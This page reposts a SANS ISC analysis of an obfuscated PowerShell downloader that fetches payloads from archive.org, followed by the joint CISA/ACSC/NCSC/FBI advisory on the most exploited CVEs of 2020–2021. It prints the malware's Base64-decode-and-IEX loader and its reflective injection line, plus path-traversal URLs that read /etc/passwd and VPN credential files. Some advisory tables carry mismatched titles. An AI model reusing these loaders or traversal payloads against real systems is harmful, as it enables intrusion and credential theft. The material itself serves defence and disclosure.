Tag Archives: Security

Malicious Content Delivered Through archive.org, (Thu, Jul 29th)

This post was originally published on this site

archive.org[1], also known as the "way back machine" is a very popular Internet site that allows you to travel back in time and browse old versions of a website (like the ISC website[2]). It works like regular search engines and continuously crawls the internet via bots. But there is another way to store content on archive.org: You may create an account and upload some content by yourself.

I found a piece of malicious Powershell that uses archive.org to download the next stage payload. It's score on VT is only 5/58[3] (SHA256:2c661f8145f82a3010e0d5038faab09ea56bf93dd55c1d40f1276c947572597b). The script is quite simple:

FUNCTION D4FD5C5B9266824C4EEFC83E0C69FD3FAA($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE)
{
  $D4FD5C5B9266824C4EEFC83E0C69FD3FAAx = "Fr"+"omBa"+"se6"+"4Str"+"ing"
  $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG = [Text.Encoding]::Utf8.GetString([Convert]::$D4FD5C5B9266824C4EEFC83E0C69FD3FAAx($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE))
  return $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG
}
$TYFGYTFFFYTFYTFYTFYT = 'hxxps://ia601505[.]us[.]archive[.]org/1/items/server-lol-123_20210606/Server_lol_123.txt'
$JUANADEARCO = 'JEZWWVRGWVRGWUZZRllGWUZHWT0 ... [removed] ... VFJEVAp9CklFWCB2aXA='
$HBAR = D4FD5C5B9266824C4EEFC83E0C69FD3FAA($JUANADEARCO);
$Run=($HBAR -Join '')|I`E`X

The Base64 data is decoded and contains more Powershell code working like a downloader. It fetches the next payload from archive.org, dumps it on the disk, and executes it with the help of the following technique:

[Reflection.Assembly]::Load($H5).GetType('VBNET.PE').GetMethod('Run').Invoke($null,[object[]] ( 'C:WindowsMicrosoft.NETFrameworkv4.0.30319aspnet_compiler.exe',$H1))

Let's put aside the malware (a classic one) and give more focus on the file grabbed from archive.org. If you go one directory above, you'll see a directory listing:

The interesting file is server-lol-123_20210606_meta.xml. It reveals interesting information about the attacker:

<metadata>
<identifier>server-lol-123_20210606</identifier>
<mediatype>texts</mediatype>
<collection>opensource</collection>
<description>Server_lol_123</description>
<scanner>Internet Archive HTML5 Uploader 1.6.4</scanner>
<subject>Server_lol_123</subject>
<title>Server Lol 123</title>
<uploader>moxey68914@revutap.com</uploader>
<collection>community</collection>
<publicdate>2021-06-06 06:52:29</publicdate>
<addeddate>2021-06-06 06:52:29</addeddate>
<curation>
[curator]validator@archive.org[/curator][date]20210606065744[/date][comment]checked for malware[/comment]
</curation>
<identifier-access>http://archive.org/details/server-lol-123_20210606</identifier-access>
<identifier-ark>ark:/13960/t9x17kx37</identifier-ark>
</metadata>

As you can see, this user uploaded a lot of files:

That's the wild Internet today: If you allow users to create an account and upload some data, chances are big that the feature will be (ab)used to host malicious content. Indeed, archive.org is a top domain and is usually not blocked or tagged as malicious.

[1] https://archive.org
[2] https://web.archive.org/web/*/isc.sans.edu
[3] https://www.virustotal.com/gui/file/2c661f8145f82a3010e0d5038faab09ea56bf93dd55c1d40f1276c947572597b/details

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AA21-209A: Top Routinely Exploited Vulnerabilities

This post was originally published on this site

Original release date: July 28, 2021

Summary

This Joint Cybersecurity Advisory was coauthored by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom’s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI). 

This advisory provides details on the top 30 vulnerabilities—primarily Common Vulnerabilities and Exposures (CVEs)—routinely exploited by malicious cyber actors in 2020 and those being widely exploited thus far in 2021.  

Cyber actors continue to exploit publicly known—and often dated—software vulnerabilities against broad target sets, including public and private sector organizations worldwide. However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system. 

Click here for a PDF version of this report.

Technical Details

Key Findings

In 2020, cyber actors readily exploited recently disclosed vulnerabilities to compromise unpatched systems. Based on available data to the U.S. Government, a majority of the top vulnerabilities targeted in 2020 were disclosed during the past two years. Cyber actor exploitation of more recently disclosed software flaws in 2020 probably stems, in part, from the expansion of remote work options amid the COVID-19 pandemic. The rapid shift and increased use of remote work options, such as virtual private networks (VPNs) and cloud-based environments, likely placed additional burden on cyber defenders struggling to maintain and keep pace with routine software patching.

Four of the most targeted vulnerabilities in 2020 affected remote work, VPNs, or cloud-based technologies. Many VPN gateway devices remained unpatched during 2020, with the growth of remote work options challenging the ability of organization to conduct rigorous patch management.

CISA, ACSC, the NCSC, and FBI consider the vulnerabilities listed in table 1 to be the topmost regularly exploited CVEs by cyber actors during 2020. 

Table 1:Top Routinely Exploited CVEs in 2020

Vendor

CVE

Type

Citrix

CVE-2019-19781

arbitrary code execution

Pulse

CVE 2019-11510

arbitrary file reading

Fortinet

CVE 2018-13379

path traversal

F5- Big IP

CVE 2020-5902

remote code execution (RCE)

MobileIron

CVE 2020-15505

RCE

Microsoft

CVE-2017-11882

RCE

Atlassian

CVE-2019-11580

RCE

Drupal

CVE-2018-7600

RCE

Telerik

CVE 2019-18935

RCE

Microsoft

CVE-2019-0604

RCE

Microsoft

CVE-2020-0787

elevation of privilege

Netlogon

CVE-2020-1472

elevation of privilege

 

In 2021, malicious cyber actors continued to target vulnerabilities in perimeter-type devices. Among those highly exploited in 2021 are vulnerabilities in Microsoft, Pulse, Accellion, VMware, and Fortinet.

CISA, ACSC, the NCSC, and FBI assess that public and private organizations worldwide remain vulnerable to compromise from the exploitation of these CVEs. Malicious cyber actors will most likely continue to use older known vulnerabilities, such as CVE-2017-11882 affecting Microsoft Office, as long as they remain effective and systems remain unpatched. Adversaries’ use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. 

Organizations are encouraged to remediate or mitigate vulnerabilities as quickly as possible to reduce the risk of exploitation. Most can be remediated by patching and updating systems. Organizations that have not remediated these vulnerabilities should investigate for the presence of IOCs and, if compromised, initiate incident response and recovery plans. See the Contact Information section below for how to reach CISA to report an incident or request technical assistance.

2020 CVEs

CISA, ACSC, the NCSC, and FBI have identified the following as the topmost exploited vulnerabilities by malicious cyber actors from 2020: CVE-2019-19781, CVE-2019-11510, CVE-2018-13379, CVE-2020-5902, CVE-2020-15505, CVE-2020-0688, CVE-2019-3396, CVE-2017-11882, CVE-2019-11580, CVE-2018-7600, CVE 2019-18935, CVE-2019-0604, CVE-2020-0787, CVE-2020-1472.[1][2][3] Among these vulnerabilities, CVE-2019-19781 was the most exploited flaw in 2020, according to U.S. Government technical analysis.CVE-2019-19781 is a recently disclosed critical vulnerability in Citrix’s Application Delivery Controller (ADC)—a load balancing application for web, application, and database servers widely use throughout the United States.[4][5] Nation-state and criminal cyber actors most likely favor using this vulnerability because it is easy to exploit, Citrix servers are widespread, and exploitation enables the actors to perform unauthorized RCE on a target system.[6

Identified as emerging targets in early 2020,[7] unremediated instances of CVE-2019-19781 and CVE-2019-11510 continued to be exploited throughout the year by nation-state advanced persistent threat actors (APTs) who leveraged these and other vulnerabilities, such as CVE-2018-13379[8][9], in VPN services[10][11] to compromise an array of organizations, including those involved in COVID-19 vaccine development.[12][13]

The CVE-2019-11510 vulnerability in Pulse Connect Secure VPN was also frequently targeted by nation-state APTs. Actors can exploit the vulnerability to steal the unencrypted credentials for all users on a compromised Pulse VPN server and retain unauthorized credentials for all users on a compromised Pulse VPN server and can retain unauthorize access after the system is patched unless all compromised credentials are changed. Nation-state APTs also commonly exploited CVE-2020-15505 and CVE-2020-5902.[14][15][16][17]

2021 CVEs

In 2021, cyber actors continued to target vulnerabilities in perimeter-type devices. In addition to the 2020 CVEs listed above, organizations should prioritize patching for the following CVEs known to be exploited. 

  • Microsoft Exchange: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 
    • See CISA’s Alert: Mitigate Microsoft Exchange Server Vulnerabilities for more information on identifying and mitigating malicious activity concerning these vulnerabilities.
  • Pulse Secure: CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900
    • See CISA’s Alert: Exploitation of Pulse Connect Secure Vulnerabilities for more information on how to investigate and mitigate this malicious activity.
  • Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104
    • See the Australia-New Zealand-Singapore-UK-U.S. Joint Cybersecurity Advisory: Exploitation of Accellion File Transfer Appliance for technical details and mitigations.
  • VMware: CVE-2021-21985
    • See CISA’s Current Activity: Unpatched VMware vCenter Software for more information and guidance. 
  • Fortinet: CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591 
    • See the CISA-FBI Joint Cybersecurity Advisory: APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks for more details and mitigations. 

Mitigations and Indicators of Compromise

One of the most effective best practices to mitigate many vulnerabilities is to update software versions once patches are available and as soon as is practicable. If this is not possible, consider applying temporary workarounds or other mitigations, if provided by the vendor. If an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems). This advisory highlights vulnerabilities that should be considered as part of the prioritization process. To further assist remediation, automatic software updates should be enabled whenever possible. 

Focusing scarce cyber defense resources on patching those vulnerabilities that cyber actors most often use offers the potential of bolstering network security while impeding our adversaries’ operations. For example, nation-state APTs in 2020 extensively relied on a single RCE vulnerability discovered in the Atlassian Crow, a centralized identity management and application (CVE-2019-11580) in its reported operations. A concerted focus on patching this vulnerability could have a relative broad impact by forcing the actors to find alternatives, which may not have the same broad applicability to their target set. 

Additionally, attackers commonly exploit weak authentication processes, particularly in external-facing devices. Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.

Tables 2–14 provide more details about, and specific mitigations for, each of the top exploited CVEs in 2020. 

Note: The lists of associated malware corresponding to each CVE below are not meant to be exhaustive but intended to identify a malware family commonly associated with exploiting the CVE.
 

Table 2: CVE-2019-19781 Vulnerability Details

Citrix Netscaler Directory Traversal (CVE-2019-19781)

Vulnerability Description
Citrix Netscaler Application Delivery Control (ADC) is vulnerable to RCE and full system compromise due to poor access controls, thus allowing directory traversal. 

CVSS 3.02 

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

The lack of adequate access controls allows an attacker to enumerate system directories for vulnerable code (directory traversal). In this instance, Citrix ADC maintains a vulnerable Perl script (newbm.pl) that, when accessed via HTTP POST request (POST https://$TARGET/vpn/../vpn/portal/scripts/newbm.pl), allows local operating system (OS) commands to execute. Attackers can use this functionality to upload/execute command and control (C2) software (webshell or reverse-shell executable) using embedded commands (e.g., curl, wget, Invoke-WebRequest) and gain unauthorized access to the OS. 

Multiple malware campaigns, including NOTROBIN, have taken advantage of this vulnerability.

Fix

Patch Available

Recommended Mitigations

  • Implement the appropriate refresh build according to the vulnerability details outlined by the vendor: Citrix: Mitigation Steps for CVE-2019-19781
  • If possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list).

Detection Methods

Vulnerable Technologies and Versions
Citrix ADC and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0

References and Additional Guidance

 

Table 3: CVE 2019-11510 Vulnerability Details

Pulse Secure Connect VPN (CVE 2019-11510)

Vulnerability Description
Pulse Secure Connect is vulnerable to unauthenticated arbitrary file disclosure. An attacker can exploit this vulnerability to gain access to administrative credentials. 

CVSS 3.0

Critical
 

Vulnerability Discussion, IOCs, and Malware Campaigns
Improper access controls allow a directory traversal that an attacker can exploit to read the contents of system files. For example, the attacker could use a string such as https://sslvpn.insecure-org.com/dana-na/../dana/html5/acc/guacmole/../../../../../../etc/passwd?/dana/html5/guacamole/ to obtain the local password file from the system. The attacker can also obtain admin session data and replay session tokens in the browser. Once compromised, an attacker can run arbitrary scripts on any host that connects to the VPN. This could lead to anyone connecting to the VPN as a potential target to compromise.  

Multiple malware campaigns have taken advantage of this vulnerability, most notably REvil/Sodinokibi ransomware.

Fix

Patch Available
 

Recommended Mitigations

  • Upgrade to the latest Pulse Secure VPN.
  • Stay alert to any scheduled tasks or unknown files/executables. 
  • Create detection/protection mechanisms that respond on directory traversal (/../../../) attempts to read local system files.
Detection Methods

  • CISA developed a tool to help determine if IOCs exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510: cisagov/check-your-pulse.
  • Nmap developed a script that can be used with the port scanning engine: http-vuln-cve2019-11510.nse #1708.

Vulnerable Technologies and Versions
Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 are vulnerable.

References

 

Table 4: CVE 2018-13379 Vulnerability Details

Fortinet FortioOS Secure Socket Layer VPN (CVE 2018-13379)

Vulnerability Description
Fortinet Secure Sockets Layer (SSL) VPN is vulnerable to unauthenticated directory traversal, which allows attackers to gain access to the sslvpn_websession file. An attacker is then able to exact clear-text usernames and passwords. 

CVSS 3.0

Critical
 

Vulnerability Discussion, IOCs, and Malware Campaigns
Weakness in user access controls and web application directory structure allows attackers to read system files without authentication. Attackers are able to perform a HTTP GET request http://$SSLVPNTARGET?lang=/../../../..//////////dev/cmdb/sslvpn_websession. This results the server responding with unprintable/hex characters alongside cleartext credential information. 

Multiple malware campaigns have taken advantage of this vulnerability. The most notable being Cring ransomware (also known as Crypt3, Ghost, Phantom, and Vjszy1lo). 

Fix

Patch Available
 

Recommended Mitigations

  • Upgrade to the latest Fortinet SSL VPN. 
  • Monitor for alerts to any unscheduled tasks or unknown files/executables.  
  • Create detection/protection mechanisms that respond on directory traversal (/../../../) attempts to read the sslvpn_websessions file. 
Detection Methods

  • Nmap developed a script that can be used with the port scanning engine: Fortinet SSL VPN CVE-2018-13379 vuln scanner #1709.

Vulnerable Technologies and Versions
Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7, and 5.4.6 to 5.4.12 are vulnerable.

References

 

Table 5: CVE-2020-5902 Vulnerability Details

F5 Big IP Traffic Management User Interface (CVE-2020-5902)

Vulnerability Description
The Traffic Management User Interface (TMUI), also referred to as the Configuration Utility, has an RCE vulnerability in undisclosed pages. 

CVSS 3.0
Critical

Vulnerability Discussion, IOCs, and Malware Campaigns
This vulnerability allows for unauthenticated attackers, or authenticated users, with network access to the Configuration Utility (through the BIG-IP management port and/or self IPs) to execute arbitrary system commands, create or delete files, disable services, and execute arbitrary Java code. This vulnerability may result in complete system compromise. The BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected. 

Fix
Upgrade to Secure Versions Available
 

Recommended Mitigations
Download and install a fixed software version of the software from a vendor approved resource. If it is not possible to update quickly, restrict access via the following actions.

  • Address unauthenticated and authenticated attackers on self IPs by blocking all access.
  • Address unauthenticated attackers on management interface by restricting access. 
Detection Methods

Vulnerable Technologies and Versions
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT) 15.1.0, 15.0.0-15.0.1, 14.1.0-14.1.2, 13.1.0-13.1.3, 12.1.0-12.1.5, and 11.6.1-11.6.5 are vulnerable.

References

 

Table 6: CVE-2020-15505 Vulnerability Details

MobileIron Core & Connector (CVE-2020-15505)

Vulnerability Description

MobileIron Core & Connector, Sentry, and Monitoring and Reporting Database (RDB) software are vulnerable to RCE via unspecified vectors.

CVSS 3.0

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

CVE-2020-15505 is an RCE vulnerability in MobileIron Core & Connector versions 10.3 and earlier. This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.

Multiple APTs have been observed exploiting this vulnerability to gain unauthorized access.

Fix

Patch Available

Recommended Mitigations

  • Download and install a fixed software version of the software from a vendor approved resource.

Detection Methods

  • None. Manually check your software version to see if it is susceptible to this vulnerability. 

Vulnerable Technologies and Versions

MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0, and 10.6.0.0; Sentry versions 9.7.2 and earlier and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier are vulnerable.

References

 

Table 7: CVE-2020-0688 Vulnerability Details

Microsoft Exchange Memory Corruption (CVE-2020-0688)

Vulnerability Description

An RCE vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory.

CVSS 3.0

High

Vulnerability Discussion, IOCs, and Malware Campaigns
CVE-2020-0688 exists in the Microsoft Exchange Server when the server fails to properly create unique keys at install time. An authenticated user with knowledge of the validation key and a mailbox may pass arbitrary objects for deserialization by the web application that runs as SYSTEM. The security update addresses the vulnerability by correcting how Microsoft Exchange creates the keys during install. 

A nation-state APT actor has been observed exploiting this vulnerability to conduct widespread, distributed, and anonymized brute force access attempts against hundreds of government and private sector targets worldwide.

Fix

Patch Available

Recommended Mitigations

  • Download and install a fixed software version of the software from a vendor approved resource.

Detection Methods

Vulnerable Technologies and Versions

Microsoft Exchange Server 2019 Cumulative Update 3 and 4, 2016 Cumulative Update 14 and 15, 2013 Cumulative Update 23, and 2010 Service Pack 3 Update Rollup 30 are vulnerable.

References

 

Table 8: CVE-2019-3396 Vulnerability Details

Microsoft Office Memory Corruption (CVE 2017-11882)

Vulnerability Description

Atlassian Confluence Server and Data Center Widget Connector is vulnerable to a server-side template injection attack.

CVSS

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

Confluence Server and Data Center versions released before June 18, 2018, are vulnerable to this issue. A remote attacker is able to exploit a server-side request forgery (SSRF) vulnerability in the WebDAV plugin to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance. A successful attack is able to exploit this issue to achieve server-side template injection, path traversal, and RCE on vulnerable systems.

Multiple malware campaigns have taken advantage of this vulnerability; the most notable being GandCrab ransomware.

Fix

Patch Available

Recommended Mitigations

  • Download and install a fixed software version of the software from a vendor-approved resource.

Detection Methods

Vulnerable Technologies and Versions

All versions of Confluence Server and Confluence Data Center before version 6.6.12, from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x) are vulnerable.

References

 

Table 9: CVE 2017-11882 Vulnerability Details

Microsoft Office Memory Corruption (CVE 2017-11882)

Vulnerability Description

Microsoft Office is prone to a memory corruption vulnerability allowing an attacker to run arbitrary code, in the context of the current user, by failing to properly handle objects in memory. It is also known as the “Microsoft Office Memory Corruption Vulnerability.” 

Cyber actors continued to exploit this four-year-old vulnerability in Microsoft Office that the U.S. Government publicly assessed last year was the most frequently targeted. Cyber actors most likely continue to exploit this vulnerability because Microsoft Office use is ubiquitous worldwide, the vulnerability is ideal for phasing campaigns, and it enables RCE on vulnerable systems.

CVSS 3.0

High

Vulnerability Discussion, IOCs, and Malware Campaigns

Microsoft Equation Editor, a component of Microsoft Office, contains a stack buffer overflow vulnerability that enables RCE on a vulnerable system. The component was compiled on November 9, 2000. Without any further recompilation, it was used in all currently supported versions of Microsoft Office. Microsoft Equation Editor is an out-of-process COM server that is hosted by eqnedt32.exe, meaning it runs as its own process and can accept commands from other processes.

Data execution prevention (DEP) and address space layout randomization (ASLR) should protect against such attacks. However, because of the manner in which eqnedt32.exe was linked, it will not use these features, subsequently allowing code execution. Being an out-of-process COM server, protections specific to Microsoft Office such as EMET and Windows Defender Exploit Guard are not applicable to eqnedt32.exe, unless applied system-wide. This provides the attacker with an avenue to lure targets into opening specially crafted documents, resulting in the ability to execute an embedded attacker commands.

Multiple cyber espionage campaigns have taken advantage of this vulnerability. CISA has noted CVE-2017-11882 being exploited to deliver LokiBot malware.

Fix

Patch Available

Recommended Mitigations

Detection Methods

  • Microsoft Defender Antivirus, Windows Defender, Microsoft Security Essentials, and the Microsoft Safety Scanner will all detect and patch this vulnerability.

Vulnerable Technologies and Versions

  • Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 are vulnerable.

References

 

Table 10: CVE 2019-11580 Vulnerability Details

Atlassian Crowd and Crowd Data Center Remote Code Execution (CVE 2019-11580)

Vulnerability Description

Atlassian Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds.

CVSS 3.0

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits RCE on systems running a vulnerable version of Crowd or Crowd Data Center.

Fix

Patch Available

Recommended Mitigations

  • Atlassian recommends customers running a version of Crowd below version 3.3.0 to upgrade to version 3.2.8. For customers running a version above or equal to 3.3.0, Atlassian recommends upgrading to the latest version.
  • Released Crowd and Crowd Data Center version 3.4.4 contains a fix for this issue and is available at https://www.atlassian.com/software/crowd/download.
  • Released Crowd and Crowd Data Center versions 3.0.5, 3.1.6, 3.2.8, and 3.3.5 contain a fix for this issue and are available at https://www.atlassian.com/software/crowd/download-archive.

Detection Methods

Vulnerable Technologies and Versions

All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.

References

 

Table 11: CVE 2018-7600 Vulnerability Details

Drupal Core Multiple Remote Code Execution (CVE 2018-7600)

Vulnerability Description

Drupal versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allow remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.

CVSS 3.0

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

An RCE vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised. Failed exploit attempts may result in a denial-of-service condition. A remote user can send specially crafted data to trigger a flaw in the processing of renderable arrays in the Form Application Programming Interface, or API, and cause the target system to render the user-supplied data and execute arbitrary code on the target system.

Malware campaigns include the Muhstik botnet and XMRig Monero Cryptocurrency mining.

Fix

Patch Available

Recommended Mitigations

  • Upgrade to the most recent version of Drupal 7 or 8 core. If running 7.x, upgrade to Drupal 7.58. If running 8.5.x, upgrade to Drupal 8.5.1.

Detection Methods

Vulnerable Technologies and Versions

  • Drupal versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 are affected.

References

 

Table 12: CVE 2019-18935 Vulnerability Details

Telerik UI for ASP.NET AJAX Insecure Deserialization (CVE 2019-18935)

Vulnerability Description

Telerik User Interface (UI) for ASP.NET does not properly filter serialized input for malicious content. Versions prior to R1 2020 (2020.1.114) are susceptible to  remote code execution attacks on affected web servers due to a deserialization vulnerability.

CVS 3.0

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

The Telerik UI does not properly sanitize serialized data inputs from the user. This vulnerability leads to the application being vulnerable to RCE attacks that may lead to a full system compromise. A vulnerable HTTP POST parameter rauPostData makes use of a vulnerable function/object AsyncUploadHandler. The object/function uses the JavaScriptSerializer.Deserialize() method, which not not properly sanitize the serialized data during the deserialization process. This issue is attacked by:

  1. Determining the vulnerable function is available/registered:  http://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau,
  2. Determining if the version running is vulnerable by querying the UI, and
  3. Creating an object (e.g., malicious mixed-mode DLL with native OS commands or Reverse Shell) and uploading the object via rauPostData parameter along with the proper encryption key.

There were two malware campaigns associated with this vulnerability:

  • Netwalker Ransomware and
  • Blue Mockbird Monero Cryptocurrency-mining.

Fix

Patch Available

Recommended Mitigations

  • Update to the most recent version of Telerik UI for ASP.NET AJAX (at least 2020.1.114 or later).

Detection Methods

  • ACSC has an example PowerShell script that can be used to identify vulnerable Telerik UI DLLs on Windows web server hosts.
  • Vulnerable hosts should be reviewed for evidence of exploitation. Indicators of exploitation can be found in IIS HTTP request logs and within the Application Windows event log. Details of the above PowerShell script and exploitation detection recommendations are available in ACSC Advisory 2020-004.
  • Exploitation of this and previous Telerik UI vulnerabilities commonly resulted in the installation of web shell malware. NSA provides guidance on detecting and preventing web shell malware.

Vulnerable Technologies and Versions

Telerik UI for ASP.NET AJAX versions prior to R1 2020 (2020.1.114) are affected.

References

 

Table 13: CVE-2019-0604 Vulnerability Details

Microsoft SharePoint Remote Code Execution (CVE-2019-0604)

Vulnerability Description

A vulnerability in an XML deserialization component within Microsoft SharePoint allowed remote attackers to execute arbitrary code on vulnerable Microsoft SharePoint servers.

CVSS 3.0

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

This vulnerability was typically exploited to install webshell malware to vulnerable hosts. A webshell could be placed in any location served by the associated Internet Information Services (IIS) web server and did not require authentication. These web shells would commonly be installed in the Layouts folder within the Microsoft SharePoint installation directory, for example:

C:Program FilesCommon FilesMicrosoft SharedWeb Server Extensions<version_number>TemplateLayouts

The xmlSerializer.Deserialize() method does not adequately sanitize user input that is received from the PickerEnitity/ValidateEnity (picker.aspx) functions in the serialized XML payloads. Once the serialized XML payload is deserialized, the XML code is evaulated for relevant XML commands and stings. A user can attack .Net based XML parsers with XMLNS payloads using the <system:string> tag and embedding malicious operating system commands. 

The exploit was used in malware phishing and the WickrMe/Hello Ransomware campaigns.

Fix

Patch Available

Recommended Mitigations

  • Upgrade on-premise installations of Microsoft Sharepoint to the latest available version (Microsoft SharePoint 2019) and patch level.
  • On-premise Microsoft SharePoint installations with a requirement to be accessed by internet-based remote staff should be moved behind an appropriate authentication mechanism such as a VPN, if possible.

Detection Methods

  • The patch level of on-premise Microsoft SharePoint installations should be reviewed for the presence of relevant security updates as outlined in the Microsoft SharePoint security advisory.
  • Vulnerable SharePoint servers should be reviewed for evidence of attempted exploitation. ACSC Advisory 2019-125 contains advice on reviewing IIS HTTP request logs for evidence of potential exploitation.
  • NSA provides guidance on detecting and preventing web shell malware.

Vulnerable Technologies and Versions

At the time of the vulnerability release, the following Microsoft SharePoint versions were affected: Microsoft Sharepoint 2019, Microsoft SharePoint 2016, Microsoft SharePoint 2013 SP1, and Microsoft SharePoint 2010 SP2.

References

 

Table 14: CVE-2020-0787 Vulnerability Details

Windows Background Intelligent Transfer Service Elevation of Privilege (CVE-2020-0787)

Vulnerability Description

The Windows Background Intelligent Transfer Service (BITS) is vulnerable to a privilege elevation vulnerability if it improperly handles symbolic links. An actor can exploit this vulnerability to execute arbitrary code with system-level privileges.

CVSS 3.0

High

Vulnerability Discussion, IOCs, and Malware Campaigns

To exploit this vulnerability, an actor would first need to have the ability to execute arbitrary code on a vulnerable Windows host.

Actors exploiting this vulnerability commonly used the proof of concept code released by the security researcher who discovered the vulnerability. If an actor left the proof of concept exploit’s working directories unchanged, then the presence of the following folders could be used as an indicator of exploitation:

C:Users<username>AppDataLocalTempworkspace
C:Users<username>AppDataLocalTempworkspacemountpoint
C:Users<username>AppDataLocalTempworkspacebait

The exploit was used in Maze and Egregor ransomware campaigns.

Fix

Patch Available

Recommended Mitigations

  • Apply the security updates as recommended in the Microsoft Netlogon security advisory.

Detection Methods

  • The patch level of all Microsoft Windows installations should be reviewed for the presence of relevant security updates as outlined in the Microsoft BITS security advisory.

Vulnerable Technologies and Versions

Windows 7 for 32-bit and x64-based Systems Service Pack 1, 8.1 for 32-bit and x64-based systems, RT 8.1, 10 for 32-bit and x64-based Systems, 10 1607 for 32-bit and x64-based Systems, 10 1709 for 32-bit and x64-based and ARM64-based Systems, 10 1803 for 32-bit and ARM64-based and x64-based Systems, 10 1809 for 32-bit and ARM64-based and x64-based Systems, 10 1903 for 32-bit and ARM64-based and x64-based Systems, 10 1909 for 32-bit, and ARM64-based and x64-based Systems are vulnerable.

Windows Server 2008 R2 for x64-based Systems Service Pack 1, 2008 R2 for x64-based Systems Service Pack 1 (Server Core Installation), 2008 for 32-bit Systems Service Pack 2, 2008 for 32-bit Systems Service Pack 2 (Server Core Installation), 2012, 2012 (Server Core Installation), 2012 R2, 2012 R2 (Server Core Installation), 2016, 2016 (Server Core Installation), 2019, 2019 (Server Core Installation), 1803 (Server Core Installation), 1903 (Server Core Installation), and 1909 (Server Core Installation) are also vulnerable.

References

 

Table 15: CVE-2020-1472 Vulnerability Details

Netlogon Elevation of Privilege (CVE-2020-1472)

Vulnerability Description

The Microsoft Windows Netlogon Remote Protocol (MS-NRPC) reuses a known, static, zero-value initialization vector (VI) in AES-CFB8 mode, which could allow an unauthenticated attacker to impersonate a domain-joined computer including a domain controller, and potentially obtain domain administrator privileges.

CVSS 3.0

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

To exploit this vulnerability, an actor would first need to have an existing presence on an internal network with network connectivity to a vulnerable Domain Controller, assuming that Domain Controllers are not exposed to the internet.

The immediate effect of successful exploitation results in the ability to authentication to the vulnerable Domain Controller with Domain Administrator level credentials. In compromises exploiting this vulnerability, exploitation was typically followed immediately by dumping all hashes for Domain accounts.

Threat actors were seen combining the MobileIron CVE-2020-15505 vulnerability for initial access, then using the Netlogon vulnerability to facilitate lateral movement and further compromise of target networks.

A nation-state APT group has been observed exploiting this vulnerability.[18]

Fix

Patch Available

Recommended Mitigations

  • Apply the security updates as recommended in the Microsoft Netlogon security advisory.

Detection Methods

  • The patch level of Domain Controllers should be reviewed for the presence of relevant security updates as outlined in the Microsoft Netlogon security advisory.
  • Reviewing and monitoring Windows Event Logs can identify potential exploitation attempts. However, further investigation would still be required to eliminate legitimate activity. Further information on these event logs is available in the ACSC 2020-016 Advisory.

